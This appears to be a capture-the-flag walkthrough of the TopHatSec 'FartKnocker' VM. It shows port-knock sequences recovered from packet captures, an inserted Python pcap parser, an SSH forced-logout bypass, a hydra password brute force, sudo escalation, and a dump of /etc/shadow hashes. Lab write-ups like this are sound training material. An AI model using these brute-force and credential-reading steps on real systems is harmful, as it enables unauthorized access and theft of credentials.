published on in writeup
tags: tophatsec

TopHatSec: FartKnocker

This VM has a focus on port knocking, the clues for which are buried in packet captures.

Discovery

[email protected]:~# nmap -n -p- -A 192.168.56.103

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).

Knock Once

The webpage on port 80 contains a simple HTML file, with a link to the first packet capture.

<html>
<a href="pcap1.pcap">Wooah</a>
</html>

So let’s download this and have a look in Wireshark. There are 2 main sections separated by ICMP request/replies.

The first sequence of packets is a series of SYN packets to ports 7000, 8000 and 9000. The second sequence is more SYN packets to ports 7000, 8000, 9000 and 8888. Knocking these ports in order opens port 8888.
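Reading the sequence off a Wireshark screen is fine for a handful of packets, but it is easy to automate. The following is an added example, not code from the original writeup: a standard-library Python parser that walks a classic pcap and returns, in knock(1) syntax, every TCP SYN-only packet and UDP datagram sent by the knocking host, in capture order. It runs here against a constructed in-memory capture that mirrors the sequences above (the attacker address 192.168.56.101 is taken from the later SSH login banner); pcapng files and non-Ethernet link types are assumed not to occur.

```python
import struct

# Constructed sample data: a minimal Ethernet/IPv4 pcap built in memory so the
# parser runs offline. Hosts and ports mirror the writeup (attacker .101, VM .103).
def _ipv4(src, dst, proto, payload):
    addr = lambda a: bytes(map(int, a.split(".")))
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64,
                       proto, 0, addr(src), addr(dst)) + payload

def _tcp(sport, dport, flags):  # 20-byte header; flags: SYN=0x02, RST/ACK=0x14
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 8192, 0, 0)

def _udp(sport, dport):
    return struct.pack("!HHHH", sport, dport, 8, 0)

def build_pcap(frames):
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # linktype 1 = Ethernet
    for ts, f in enumerate(frames):
        out += struct.pack("<IIII", ts, 0, len(f), len(f)) + f
    return out

ETH = b"\x00" * 12 + b"\x08\x00"  # dummy MACs + EtherType IPv4
ATTACKER, TARGET = "192.168.56.101", "192.168.56.103"
SAMPLE_PCAP = build_pcap([
    ETH + _ipv4(ATTACKER, TARGET, 6, _tcp(40000, 7000, 0x02)),
    ETH + _ipv4(TARGET, ATTACKER, 6, _tcp(7000, 40000, 0x14)),  # VM's RST/ACK, ignored
    ETH + _ipv4(ATTACKER, TARGET, 6, _tcp(40001, 8000, 0x02)),
    ETH + _ipv4(ATTACKER, TARGET, 17, _udp(40002, 22)),
    ETH + _ipv4(ATTACKER, TARGET, 6, _tcp(40003, 9000, 0x02)),
])

def extract_knock_sequence(pcap, src_ip):
    """Knock sequence sent by src_ip in knock(1) syntax: SYN as '7000', UDP as '22:udp'."""
    endian = "<" if struct.unpack("<I", pcap[:4])[0] == 0xA1B2C3D4 else ">"
    seq, off = [], 24  # skip the 24-byte global header
    while off + 16 <= len(pcap):
        caplen = struct.unpack(endian + "IIII", pcap[off:off + 16])[2]
        frame = pcap[off + 16:off + 16 + caplen]
        off += 16 + caplen
        if frame[12:14] != b"\x08\x00":
            continue  # not IPv4
        ip = frame[14:]
        ihl, proto = (ip[0] & 0x0F) * 4, ip[9]
        if ".".join(map(str, ip[12:16])) != src_ip:
            continue  # replies from the VM and ICMP separators are not knocks
        l4 = ip[ihl:]
        dport = struct.unpack("!H", l4[2:4])[0]
        if proto == 6 and (l4[13] & 0x12) == 0x02:  # SYN set, ACK clear
            seq.append(str(dport))
        elif proto == 17:
            seq.append("%d:udp" % dport)
    return seq
```

Joining the returned list with spaces gives the argument string for knock directly; the same function can be pointed at pcap1.pcap or pcap2.pcap by reading the file into bytes.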

[email protected]:~# knock -v 192.168.56.103 7000 8000 9000 7000 8000 9000 8888; nc 192.168.56.103 8888
hitting tcp 192.168.56.103:7000
hitting tcp 192.168.56.103:8000
hitting tcp 192.168.56.103:9000
hitting tcp 192.168.56.103:7000
hitting tcp 192.168.56.103:8000
hitting tcp 192.168.56.103:9000
hitting tcp 192.168.56.103:8888
/burgerworld/

Knock Twice

[email protected]:~# curl 192.168.56.103/burgerworld/
<html>
<a href="pcap2.pcap">heheh...hehh..</a>
</html>
[email protected]:~# wget 192.168.56.103/burgerworld/pcap2.pcap
[email protected]:~# wireshark pcap2.pcap 

There are quite a few more packets this time, so I made the review a bit easier by putting a source IP filter in place.

This time we have a SYN on port 21, UDP packet on port 22, SYN on 80 and a SYN on 8080.

[email protected]:~# knock -v 192.168.56.103 21 22:udp 80 8080; nc 192.168.56.103 8080
hitting tcp 192.168.56.103:21
hitting udp 192.168.56.103:22
hitting tcp 192.168.56.103:80
hitting tcp 192.168.56.103:8080
(UNKNOWN) [192.168.56.103] 8080 (http-alt) : Connection refused
[email protected]:~# knock -v 192.168.56.103 21 22:udp 80 8080; nc 192.168.56.103 8080
hitting tcp 192.168.56.103:21
hitting udp 192.168.56.103:22
hitting tcp 192.168.56.103:80
hitting tcp 192.168.56.103:8080

                      MMMMMMM           MMMMMMH 
                HMMMMM:::::::.MMMMMMMMMM:::::.TMM
              MMMI:::::::::::::::::::MMH::::::::TM
            MMIi::::::::::::.:::::::::::::::::::::MMMM
           MT::::.::::::::::::::::::::::::::::::.::=T.IMMM
         MMMi:::::::::::::::::::::::::::::::::::::::::::MT)MM
     MMMI.:::::::::::::::::::::::::::::::::::::::::::.:::M= MM
   XMXi::::::::::::::::::::::.:::::::::::::::::::::::::::::::=MM
   MMi::::::::::::::::::::::::::::::::::::::::::::::::::.::..:=MMM
  MM:MMT:::::::::.:::::::::::::::::.:::::::::::::::::::::::::::MiMM
   MMM::::::::::::::::::.::::::::::::::::::::::::::.::::::::::.TM.MM
   MMi::::::::::::::.::::::::::::::::::::::::::::::::::::::.:::.:: M
   MM:::.::::::::::::::::::::::::::::::::.:.:::::::::::::::::::::: XM
 MM:MT::.::::::::::::::::::::::::::::::::::::::::::::::::::::::::::XM
IMM:::.::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::.=M
 MM::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :::M
 XMT:::::::::::::::::::::: ::::::::::::::::: : ::::::::::::::::::: iM
   MiMi:::::::::: :::::::::::::::::::::::::::::::: ::::::::::::::.:IM
     M::::::HH::::::::::::::::::::::::::::::::::::::::::::::::::::: M
     MT:::::iM::::::::Hi:iXH:::ii::XH:::::::::::::.::::::::::::::.:.M
      MX:::::iMX:i::::iMi:iMH::XH::Mi:::::::::::::::::::::::::::::: M
        Mii::::HMH:::::iMH::MH=:MM=TMi::::::::::::::::::::::::::::::MM
          MMMMMMMMMMMXTi:MMHi:HMMIMMMMii::::::::::::::::::::::::::::XM
           XXOXMMT:. ::T= :IMMMMMMM=iXMii:::::::::::::::::::::::::: MM
            MMMH:::.:::::::.::::.::::.:XMi::::::::::::::::::::::::::MM
           XMM::.:.:..::..:.:.::.:.::: ::XMi::::::::::::::::::::::::MX
          XMMT::::.:.::.::::.::.::::::::.::XH:::::::::::::::::::::: M
          HMX::...:..::..:.:.::::::..... :::XX::::::::::::::.:::::. M
          MM:::....:::::.::::::..:::::.:..:::HX::::::::::::::::::::=M
          MX::::::::::::::::::::::..::::.:..::X::::::::::::::::::::IM
         XMI..  .:.::....:..::::.:: ::...::.:.MH:::::::::::::::::.: M
         MM:. ::..::....::.::::::....:.:...:..MT::.   ::::::::: :..IM
         MM=:::::.::.:::::..::::.: .::..::..::Mi:::::::::::::::::: MM
         MMI:::...:  .::..::::::.:::::::.::::TM:::::::::::::::::::=MO
          MH.: .::::.::.. .:::::iLMXX=::::.:.Mi::::::: ::::::::::.MM
          MX:.:..:: .:.:.:.: :MMM:::..:::::.HM:::: :::::::::::::.MM
          MM:::...::....: ::IMT:::.:...:.::.MT::::::: ::::::::: MM
           M=::..::::..:::MM:i:..::.:...: ::M:::: ::: ::::::::::MI
           MH::: :.:.: MMMM=:::.:.:...:....iM::: ::::::  ::::::LM
          MMMMT.::. ::TM:::::..::::::::.::.IM::::HH:::::::::::.MO
           MM:LM::T:MT.:: .......:....:.:: TMMiXMT.MH:::.::::.:M=
            M:. :::MMi:::MMMM=::::::.::..::=MMMMMMXMH:::.:::::MM
           XMI: :..::=MX  :M::.......:...:::.MXTHM MH:::.: :.XM
           MM XMMI IM    M   ................:: :MIIM:::::::MMO
            MMXXMILM  .ML.= :.:::....:.:..::.:..:::MMT:::::TMM
              MXMLMMMT::.:...:........ ....::.:.=.MMMM:::::MM
              MHM=:: :.:::...::::.:...:.....:: =MMM==Mi::::M
              MM=:::.......:.:.::.:.::...:.: ::  . ::=M:: MM
             MMi:=XMMMi::::...:::::.::.:::::::::..: ::Mi:=MT
            MM=:I::  :iMH==:::::.::.:::::::::::::::.::MT:XMT
           MT=:=MMMMMMM=HM::::.::::::MMT=Mi::::::..:::MI=MM
          M ::::::.=I= .MX:..: ::::.::MX::::.:::.:.  .XMMM
         M:MMMMMMM=.::::  ::.::...:.MMIM::.:::.::..::::M
                 M=:: : ::::.==XMMM:XMMM=:::.::.:.::::.M
                 M=.IMMM )X   M  MMMMMM=:::..::..:::.::M
                 MM  X  MMM:MMMMMMMMM=:::.:.:.. .:.::::M
                  MIMMMMMMMMMMMMMMI::::::::.:::.:...:.:M
                MMMMMMMMMMMMMX:.   .:..::....:...:::.:iM
               MMMMMMMMMMI::::::.:.::...:....:.....:.:=M
           MMMMMMMMMI:::::.:.. :.::.::..........:..:..:M
            M=:  :..::..::.........::.......::.:.....: M
             MMMi::::::.:.:==MMMMMMMMMT:.:.:::..:::..: OM
               MM=::..: OMMMM         MMMT:::....:.::: :M
                M=::::MM                MMI:::........:OM
                 MMMMM                   MMH:::..::MMMMMM
                                          MMMMMMMMMMMMMMM


                     CAN YOU UNDERSTAND MY MESSAGE?!



        eins drei drei sieben

Knock Thrice

eins drei drei sieben is German for one three three seven: 1337, get it ;)

[email protected]:~# knock -v 192.168.56.103 1 3 3 7; nc 192.168.56.103 1337
hitting tcp 192.168.56.103:1
hitting tcp 192.168.56.103:3
hitting tcp 192.168.56.103:3
hitting tcp 192.168.56.103:7
(UNKNOWN) [192.168.56.103] 1337 (?) : Connection refused
[email protected]:~# knock -v 192.168.56.103 1 3 3 7; nc 192.168.56.103 1337
hitting tcp 192.168.56.103:1
hitting tcp 192.168.56.103:3
hitting tcp 192.168.56.103:3
hitting tcp 192.168.56.103:7
/iamcornholio/
[email protected]:~# curl 192.168.56.103/iamcornholio/
<html>
T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK
</html>

This is a base64 encoded string.

[email protected]:~# echo -en "T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK" | base64 -d
Open up SSH: 8888 9999 7777 6666

Knock Four-ice?

[email protected]:~# knock -v 192.168.56.103 8888 9999 7777 6666; ssh 192.168.56.103
hitting tcp 192.168.56.103:8888
hitting tcp 192.168.56.103:9999
hitting tcp 192.168.56.103:7777
hitting tcp 192.168.56.103:6666
ssh: connect to host 192.168.56.103 port 22: Connection refused
[email protected]:~# knock -v 192.168.56.103 8888 9999 7777 6666; ssh 192.168.56.103
hitting tcp 192.168.56.103:8888
hitting tcp 192.168.56.103:9999
hitting tcp 192.168.56.103:7777
hitting tcp 192.168.56.103:6666
############################################
# CONGRATS! YOU HAVE OPENED THE SSH SERVER #
# USERNAME: butthead                       #
# PASSWORD: nachosrule                     #
############################################
root@192.168.56.103's password: 

SSH

It was very nice of it to give us the credentials for butthead, but we get kicked off straight away.

[email protected]:~# ssh butthead@192.168.56.103
############################################
# CONGRATS! YOU HAVE OPENED THE SSH SERVER #
# USERNAME: butthead                       #
# PASSWORD: nachosrule                     #
############################################
butthead@192.168.56.103's password: 
Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-46-generic i686)

 * Documentation:  https://help.ubuntu.com/
Last login: Wed Apr  8 16:30:47 2015 from 192.168.56.101
You are only logging in for a split second! What do you do!
Connection to 192.168.56.103 closed.

We can get around this by simply placing a shell command to run at the end of the line, e.g.:

[email protected]:~# ssh butthead@192.168.56.103 id
butthead@192.168.56.103's password: 
uid=1001(butthead) gid=1001(butthead) groups=1001(butthead)

Of course, invoking /bin/bash saves a lot of tediousness.

[email protected]:~# ssh butthead@192.168.56.103 /bin/bash
butthead@192.168.56.103's password: 

id
uid=1001(butthead) gid=1001(butthead) groups=1001(butthead)
whoami
butthead

ls -l
total 4
-rw-rw-r-- 1 butthead butthead 67 Mar  3 00:33 nachos

cat nachos
Great job on getting this far.

Can you login as beavis or root ?

Getting Beavis!

This portion of the VM took me something like 6 hours! Getting beavis’ password was a complete pain >:D

I figured that the password would be Beavis and Butthead related. So I used CeWL to pull words from various sources such as Wikipedia and IMDB quote pages. I ran the wordlist through hydra but no valid login was found :(

The final trick was to a) remove all spaces; b) convert all characters to lowercase.

Eventually…

[email protected]:~# hydra -l beavis -P wordlist -f -t 32 192.168.56.103 ssh
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

[22][ssh] host: 192.168.56.103   login: beavis   password: mikejudge
[STATUS] attack finished for 192.168.56.103 (valid pair found)
[email protected]:~# ssh beavis@192.168.56.103

beavis@Huhuhhhhhuhuhhh:~$ id; whoami
uid=1000(beavis) gid=1000(beavis) groups=1000(beavis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)
beavis

Root

Beavis is a member of the sudo group, making the escalation a trivial exercise.

beavis@Huhuhhhhhuhuhhh:~$ sudo -l
[sudo] password for beavis: 
Matching Defaults entries for beavis on Huhuhhhhhuhuhhh:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User beavis may run the following commands on Huhuhhhhhuhuhhh:
    (ALL : ALL) ALL
beavis@Huhuhhhhhuhuhhh:~$ sudo -i

root@Huhuhhhhhuhuhhh:~# cat /etc/shadow
root:$6$iKFfVKIm$TChaO1huLt0YVVUKdQ./4/nPKa7hL96JRDUk0qzBt0Hl9MeYCzZD5cS9qaxxbzif78mX8XiO2seiukv0vPL48/:16497:0:99999:7:::
beavis:$6$vL7Sn7xS$vmqKbPx1nahNiF8YmITZqgXhv89G/aMQSMJOfN5meoOQtcsIAxrlTyC/pUHwoDkWkkq2Umr7HawkiLrnYFqI11:16496:0:99999:7:::
butthead:$6$wl1mxaMt$ginoPx9IAhi6WnJzrhH0bUDDhQVhLPWOvYAaT9Tf2hgauBiOxbNNY8WZMSSg1n0XEkvSoGKvV8EtibKg0AP1Y.:16497:0:99999:7::